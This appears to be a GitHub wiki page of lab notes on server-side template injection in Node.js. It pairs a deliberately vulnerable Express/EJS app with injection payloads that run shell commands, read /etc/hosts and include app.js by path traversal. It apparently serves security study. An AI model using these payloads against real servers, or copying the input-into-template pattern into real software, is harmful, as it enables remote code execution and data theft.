SSTI nodejs 02 - yujitounai/helloworld GitHub Wiki
const express = require('express')
var bodyParser = require('body-parser');
const app = express()
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
//Dependent of Templating engine
var ejs = require('ejs');
const port = 5063
function getHTML(input){
console.log(input);
var template =`<!DOCTYPE html><html><body>
<form action="/" method="post">
First name:<br>
<input type="text" name="name" value="">
<input type="submit" value="Submit">
</form><p>Hello `+input+`</p></body></html>`
var html =ejs.render(template,{ name: "Venus" })
return html;
}
app.post('/', (request, response) => {
var input = request.param('name', "")
var html = getHTML(input)
response.send(html);
})
app.get('/', (request, response) => {
var html = getHTML("")
response.send(html)
})
app.listen(port, (err) => {
if (err) {
return console.log('something bad happened', err)
}
console.log(`server is listening on ${port}`)
})
- Dockerfile
FROM node:6
COPY src/ /home
RUN npm install
RUN npm install ejs
RUN npm install express
https://github.com/DiogoMRSilva/websitesVulnerableToSSTI/blob/master/javascript/EJS/
<%- 7*7 %>
<%= 7*7 %>
どちらでもよさげ
<%- global.process.mainModule.require('child_process').execSync('ls').toString() %>
<%- global.process.mainModule.require('child_process').execSync('cat /etc/hosts') %>
<%- include('../../../app.js') %>